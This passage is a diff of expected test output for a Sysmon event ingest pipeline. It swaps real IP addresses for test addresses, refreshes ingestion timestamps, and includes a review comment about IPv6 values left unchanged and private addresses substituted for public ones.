@@ -20956,7 +20684,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742677900Z", + "ingested": "2021-12-09T13:50:23.457704800Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:40:42.447293700Z'/\u003e\u003cEventRecordID\u003e231\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:40:40.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-001016f70000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e636\u003c/Data\u003e\u003cData Name='QueryName'\u003ewpad\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21030,12 +20758,12 @@ "type": "CNAME" }, { - "data": "65.55.44.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "network": { 
@@ -21053,13 +20781,13 @@ "v10.vortex-win.data.microsoft.com" ], "ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742686300Z", + "ingested": "2021-12-09T13:50:23.457710500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:42:55.556Z", @@ -21123,12 +20851,12 @@ "type": "CNAME" }, { - "data": "20.36.218.63", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "network": { 
@@ -21144,13 +20872,13 @@ "settings-win.data.microsoft.com" ], "ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742695Z", + "ingested": "2021-12-09T13:50:23.457716100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:43:06.459Z", 
@@ -21246,7 +20974,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742703400Z", + "ingested": "2021-12-09T13:50:23.457721900Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-27T20:00:14.324234100Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='7144' ThreadID='6876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-27 20:00:14.320\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-7c4e-5f98-5803-000000000500}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\notepad.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.475 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eNotepad\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eNOTEPAD.EXE\u003c/Data\u003e\u003cData Name='CommandLine'\u003e\"C:\\Windows\\system32\\notepad.exe\" \u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Users\\vagrant\\\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT\\vagrant\u003c/Data\u003e\u003cData 
Name='LogonGuid'\u003e{9f32b55f-6fdd-5f98-e7c9-020000000000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x2c9e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e1\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eMedium\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=B6D237154F2E528F0B503B58B025862D66B02B73\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{9f32b55f-6fdf-5f98-7000-000000000500}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e4212\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\explorer.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21302,7 +21030,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-06-14T13:23:14.742712100Z", + "ingested": "2021-12-09T13:50:23.457727800Z", "code": "25", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e25\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e25\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T14:43:23.551269400Z'/\u003e\u003cEventRecordID\u003e10737797\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='5080'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 14:43:23.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-b78b-6037-6f13-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2628\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Git\\mingw64\\libexec\\git-core\\git.exe\u003c/Data\u003e\u003cData Name='Type'\u003eImage is replaced\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21376,7 +21104,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742720400Z", + "ingested": "2021-12-09T13:50:23.457733500Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-12T06:48:27.084044200Z'/\u003e\u003cEventRecordID\u003e2243\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1188' ThreadID='1600'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-12 06:48:27.084\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-4664-5eba-91ae-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e820\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\system32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\System32\\LogFiles\\Scm\\8b34f644-f627-47e7-98e0-957ba1c5eb6d\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=5A9BDDF83BE530B481F0FD24DB28A6FF,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21470,7 +21198,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742728900Z", + "ingested": "2021-12-09T13:50:23.457739300Z", "code": "7", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e7\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e7\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-28T02:39:26.388325200Z'/\u003e\u003cEventRecordID\u003e10685\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1676' ThreadID='4796'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-28 02:39:26.374\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-d9de-5f98-f006-000000000600}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5184\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\dllhost.exe\u003c/Data\u003e\u003cData Name='ImageLoaded'\u003eC:\\Windows\\System32\\IDStore.dll\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.1 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eIdentity Store\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eIdStore.dll\u003c/Data\u003e\u003cData 
Name='Hashes'\u003eSHA1=9955A1C071C44A7CEECC0D928A9CFB7F64CC3F93,MD5=C7C45610F644906E6F7D664EF2E45B08,SHA256=4808F1101F4E42387D8DDB7A355668BAE3BF6F781C42D3BCD82E23446B1DEB3E,IMPHASH=194F3797B52231028C718B6D776C6853\u003c/Data\u003e\u003cData Name='Signed'\u003etrue\u003c/Data\u003e\u003cData Name='Signature'\u003eMicrosoft Windows\u003c/Data\u003e\u003cData Name='SignatureStatus'\u003eValid\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21530,7 +21258,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742737300Z", + "ingested": "2021-12-09T13:50:23.457745100Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818869100Z'/\u003e\u003cEventRecordID\u003e2691\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21602,7 +21330,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-06-14T13:23:14.742745900Z", + "ingested": "2021-12-09T13:50:23.457751Z", "code": "24", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e24\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e24\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T15:04:48.607343500Z'/\u003e\u003cEventRecordID\u003e10757412\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='6444'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 15:04:48.592\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-aa1b-602f-a600-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2144\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u003c/Data\u003e\u003cData Name='Session'\u003e1\u003c/Data\u003e\u003cData Name='ClientInfo'\u003euser: DESKTOP-I9CQVAQ\\luks\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA256=7ADB1CF1A75973079C055F929573AE92557A8C0E5B0E38A6A5427E412FB73D59,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21660,7 +21388,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742754400Z", + "ingested": "2021-12-09T13:50:23.457756700Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e32\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\gfdkimpbcpahaombhbimeihdjnejgicl\\def\\ee4a6e45-bffd-49f4-98ae-32aebcc890b5.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.339\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21728,11 +21456,11 @@
 "type": "CNAME"
 },
 {
- "data": "40.121.17.79",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -21740,7 +21468,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -21748,7 +21476,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -21757,12 +21485,12 @@
 }
 ],
 "resolved_ip": [
- "40.121.17.79",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30"
 ]
 },
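Review bot: In the `@@ -21757,12 +21485,12 @@` hunk the IPv4 entries of `resolved_ip` are rewritten, but the IPv6 entries `2001:503:a83e::2:30`, `2001:503:231d::2:30` and `2001:503:83eb::30` keep their original public addresses; the same half-applied state appears in the following `@@ -21780,19 +21508,19 @@` hunk, both in the `"ip"` array and inside the `QueryResults` text of `event.original`. If the "supported subset" of test public IPs named in the changelog also applies to IPv6, those three values should be replaced as well (a documentation range such as `2001:db8::` would do); if the constraint is IPv4-only, one sentence in the PR description saying so would settle the question for the next reader. Separately, three of the four A records of a public hostname are now RFC 1918 addresses (`192.168.6.30`, `192.168.14.30`, `192.168.92.30`) next to one public one, so if any pipeline step branches on public vs. private address, this expected document now exercises a different path than the original capture did and is worth re-generating rather than hand-edited. The enclosing event object starts and ends outside these hunks.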
@@ -21780,19 +21508,19 @@
 "c.urs.microsoft.com"
 ],
 "ip": [
- "40.121.17.79",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30"
 ]
 },
 "event": {
- "ingested": "2021-06-14T13:23:14.742763100Z",
+ "ingested": "2021-12-09T13:50:23.457762300Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData 